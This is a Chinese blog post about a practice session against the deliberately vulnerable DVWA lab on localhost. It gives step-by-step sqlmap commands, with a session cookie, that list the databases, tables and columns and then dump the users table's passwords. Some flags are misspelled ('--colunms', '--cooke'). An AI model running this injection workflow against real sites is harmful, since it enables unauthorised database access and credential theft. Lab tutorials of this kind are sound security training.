您的位置:首页 > 数据库

SQLmap注入学习实战 —— dvwa 从low到impossble

2018-01-10 05:12 501 查看
大晚上失眠了于是来写博客

你为啥这么勤奋

白天玩了手动注入,结果发现sql注入的难度给我自动设置成impossible了。每次都要改包,可能这是dvwa在win下的bug吧,虽说不致命,却有些许麻烦。

low级别注入 经过试验发现,medium和high其实都可以这么玩 你SQLMAP真强大

爆破库名

由于DVWA的注入是 GET类型的 详细参照前面一篇笔记。 所以我们这边要还要提交 cookie的值。 通过burpsuite截取包裹,我们发现我们包裹的cookie是

--cookie="security=impossible; security=low; Phpstorm-1c732ebb=8670e59f-a605-41f8-ad48-cfe0c5467ac0;PHPSESSID=ejq8q5fgjdcshgej49de1q2557"
这就是我说的不太对的地方了,明明设置成了low,可是cookie里面居然还提交了impossible,还有这个phpstrom是啥东西。。。我phpstorm开都没有开啊。
所以这正常的应该是这样子的。
--cooke="security=low; PHPSESSID=ejq8q5fgjdcshgej49de1q2557"


好了,然后我们打开sqlmap 输入

sqlmap -u "http://localhost/DVWA/vulnerabilities/sqli/?id=2&Submit=Submit" --cookie="security=low; PHPSESSID=ejq8q5fgjdcshgej49de1q2557" --dbs


不是很推荐用默认YES的选项,可能会错过一些很关键的操作,但是比较懒的话,还是加上 –batch吧

available databases [5]:
[*] dvwa
[*] information_schema
[*] mysql
[*] performance_schema
[*] sys


爆破表

倒完之后呢,接下来进入 爆破表

输入代码

记住 -D 与 –tables 使用 tables不是列表的意思么。

sqlmap -u "http://localhost/DVWA/vulnerabilities/sqli/?id=2&Submit=Submit" --cookie="security=low; PHPSESSID=ejq8q5fgjdcshgej49de1q2557" -D dvwa --tables


爆破列

爆破列

记住 -T 和 –colunms 结合使用 colunms不就是列么?

sqlmap -u "http://localhost/DVWA/vulnerabilities/sqli/?id=2&Submit=Submit" --cookie="security=low; PHPSESSID=ejq8q5fgjdcshgej49de1q2557" -D dvwa -T users --colunms


爆破字段

爆破字段

记住 -C 和 –dump 结合使用 dump就是倾倒的意思嘛~~

sqlmap -u "http://localhost/DVWA/vulnerabilities/sqli/?id=2&Submit=Submit" --cookie="security=low; PHPSESSID=ejq8q5fgjdcshgej49de1q2557" -D dvwa -T users -C password,users --dump


然后就找到密码了。

一般都是这个流程。

写篇博文过一下知识点,这些流程网上其实都找得到的。

2018年1月10日04:54:57

烧包

哇,再过一个小时就可以去晨跑了
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 点击这里给我发消息
标签:  dvwa sqlmap sql